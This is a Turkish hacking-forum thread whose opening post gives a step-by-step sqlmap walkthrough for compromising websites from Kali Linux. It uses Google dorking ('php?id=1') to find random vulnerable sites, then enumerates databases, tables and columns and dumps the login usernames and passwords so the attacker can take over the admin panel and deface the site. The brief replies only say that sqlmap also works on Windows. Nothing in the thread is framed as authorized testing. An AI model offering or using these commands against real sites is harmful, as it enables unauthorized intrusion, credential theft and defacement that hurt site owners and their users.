Kali Linux'ta Website Hacklemek

MRXMAX

Yeni üye
29 Ocak 2016
21
0
Kütahya
Selaymun Aleyküm arkadaşlar . İlk önce benim bir hesabım vardı . Fakat şifresini unutunca mecbur yenisini açtım . Noob değilim . :RpS_sleep: :RpS_sleep:

( BU ARADA BU YAZI WEBSİTEYE DDOS ATAK DEĞİL ARAYÜZÜNÜ DEĞİŞTİRME SALDIRISIDIR ! )

Konumuz website hack fakat kali linux üzerinden haydi başlıyoruz.

1) İlk olarak sitemizde SQL açığı bulunması gerekiyor . Bunun için de googleye '' php?id=1 '' komutunu aratmamız gerekiyor . ( Eğer rastgele bir site hackleyecekseniz bunu yapabilirsiniz . ) Fakat belli bir site varsa elinizdeki siteyi hacklemeyi deneyeceksiniz.

2) Sitemizi seçtikten sonra sitemize girip urlyi kopyalıyoruz .

3) Terminalimizi açtıktan sonra kodumuzu giriyoruz . '' sqlmap -u ' sitenin urlsi ' --dbs '' Bu komut bize uygun databaseleri gösterecektir .

4) Orada önünüze databaseler çıkacaktır . Bunlardan birini seçin fakat ' www ' databasesi çıktıysa
onu seçin derim .

5) Seçtikten sonra komutu giriyoruz . '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' --tables
'' Bu komut ise bize tableleri gösterir . Önünüze 10'dan fazla gelebilir.

6) Tablelerin arasından ise sonunda ' login ' ve ' users ' olanları not ediyoruz.(Herhangi bir yere)

7) Bizim işimiz login ile . Komutumuzu giriyoruz. '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' --columns ''

8) Bu komut bize login için uygun columnsları gösterecektir. Komutu girdiğimizde columnslar gelir ve biz ilk önce usernameye bakarız. Usernameyi görmek için ise bu komut işimize yarar.

''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C username --dump ''

9) Bu komuttan sonra usernameyi buluruz. Ve sıra şifrede :woott :RpS_biggrin: :RpS_thumbup:

''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C password --dump ''

10) Bu komuttan sonra da şifre de bizim elimizde ve artık panele girip sitenin ******* :diablo

Herkese iyi günler ve unutmayın '' AÇIĞI OLMAYAN TEK SİSTEM EVRENDİR '' :trl
 

exlord06

Katılımcı Üye
31 Mar 2013
394
0
Ankara
Bu sadece kali linux icin gecerli bir yontem degil ki . anlattigin sqlmap windowsda da cok kolay yapilabiliyor
 

Serter19

Uzman üye
6 Nis 2016
1,039
0
Bu zaten sqlmap a girer ki sqlmap ile site hacklemek için konular var bu windowstada yapılabilir bence gereksiz bi konu.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.